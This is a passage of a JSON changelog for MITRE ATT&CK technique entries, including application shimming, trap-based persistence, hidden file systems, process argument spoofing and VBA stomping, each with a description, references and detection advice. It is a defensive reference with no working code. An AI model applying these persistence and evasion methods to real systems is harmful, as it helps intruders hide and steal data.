"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:09.378000+00:00\", \"old_value\": \"2025-04-15 19:58:16.171000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-19 18:46:06.098000+00:00", + "modified": "2025-04-25 14:46:00.964000+00:00", + "name": "Local Email Collection", + "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114/001", + "external_id": "T1114.001" + }, + { + "source_name": "Outlook File Sizes", + "description": "N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.", + "url": "https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/" + }, + { + "source_name": "Microsoft Outlook Files", + "description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.", + "url": "https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Access", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:00.964000+00:00\", \"old_value\": \"2025-04-15 19:58:12.090000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1041: Encrypt Sensitive Information", + "M1060: Out-of-Band Communications Channel" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0017: Command (Command Execution)", + "DS0022: File (File Access)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 14:56:24.231000+00:00", + "modified": "2025-04-25 14:46:29.459000+00:00", + "name": "Application Shimming", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/011", + "external_id": "T1546.011" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "FireEye Application Shimming", + "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.", + "url": "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf" + }, + { + "source_name": "Black Hat 2015 App Shim", + "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.", + "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification", + "Module: Module Load", + "Windows Registry: Windows Registry Key Modification", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:29.459000+00:00\", \"old_value\": \"2025-04-15 19:58:26.274000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1051: Update Software", + "M1052: User Account Control" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Modification)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 14:17:43.906000+00:00", + "modified": "2025-04-25 14:46:52.100000+00:00", + "name": "Trap", + "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/005", + "external_id": "T1546.005" + }, + { + "source_name": "Trap Manual", + "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", + "url": "https://ss64.com/bash/trap.html" + }, + { + "source_name": "Cyberciti Trap Statements", + "description": "Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.", + "url": "https://bash.cyberciti.biz/guide/Trap_statement" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Creation", + "Process: Process Creation", + "Command: Command Execution", + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:52.100000+00:00\", \"old_value\": \"2025-04-15 19:58:36.056000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:30:21.689000+00:00", + "modified": "2025-04-25 15:16:21.879000+00:00", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1008", + "external_id": "T1008" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:21.879000+00:00\", \"old_value\": \"2025-04-15 19:59:20.736000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-28 22:55:55.719000+00:00", + "modified": "2025-04-25 14:48:18.639000+00:00", + "name": "Hidden File System", + "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/005", + "external_id": "T1564.005" + }, + { + "source_name": "MalwareTech VFS Nov 2014", + "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.", + "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html" + }, + { + "source_name": "FireEye Bootkits", + "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" + }, + { + "source_name": "ESET ComRAT May 2020", + "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf" + }, + { + "source_name": "Kaspersky Equation QA", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification", + "File: File Modification", + "Windows Registry: Windows Registry Key Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:18.639000+00:00\", \"old_value\": \"2025-04-15 19:59:14.404000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0001: Firmware (Firmware Modification)", + "DS0022: File (File Modification)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-26 17:46:13.128000+00:00", + "modified": "2025-04-25 14:48:27.868000+00:00", + "name": "Hidden Files and Directories", + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/001", + "external_id": "T1564.001" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "File: File Metadata", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:27.868000+00:00\", \"old_value\": \"2025-04-15 19:59:19.293000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-11-19 14:13:11.335000+00:00", + "modified": "2025-04-25 14:48:40.519000+00:00", + "name": "Process Argument Spoofing", + "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/010", + "external_id": "T1564.010" + }, + { + "source_name": "Microsoft PEB 2021", + "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" + }, + { + "source_name": "Xpn Argue Like Cobalt 2019", + "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.", + "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/" + }, + { + "source_name": "Cobalt Strike Arguments 2019", + "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.", + "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/" + }, + { + "source_name": "Nviso Spoof Command Line 2020", + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", + "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + }, + { + "source_name": "Mandiant Endpoint Evading 2019", + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.", + "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:40.519000+00:00\", \"old_value\": \"2025-04-15 19:59:25.123000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-17 12:51:40.845000+00:00", + "modified": "2025-04-25 14:48:00.627000+00:00", + "name": "VBA Stomping", + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/007", + "external_id": "T1564.007" + }, + { + "source_name": "FireEye VBA stomp Feb 2020", + "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html" + }, + { + "source_name": "Evil Clippy May 2019", + "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.", + "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/" + }, + { + "source_name": "Microsoft _VBA_PROJECT Stream", + "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.", + "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239" + }, + { + "source_name": "Walmart Roberts Oct 2018", + "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020.", + "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278" + }, + { + "source_name": "pcodedmp Bontchev", + "description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.", + "url": "https://github.com/bontchev/pcodedmp" + }, + { + "source_name": "oletools toolkit", + "description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.", + "url": "https://github.com/decalage2/oletools" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Rick Cole, Mandiant" + ], + "x_mitre_data_sources": [ + "File: File Metadata", + "Script: Script Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection efforts should be placed finding differences between VBA source code and 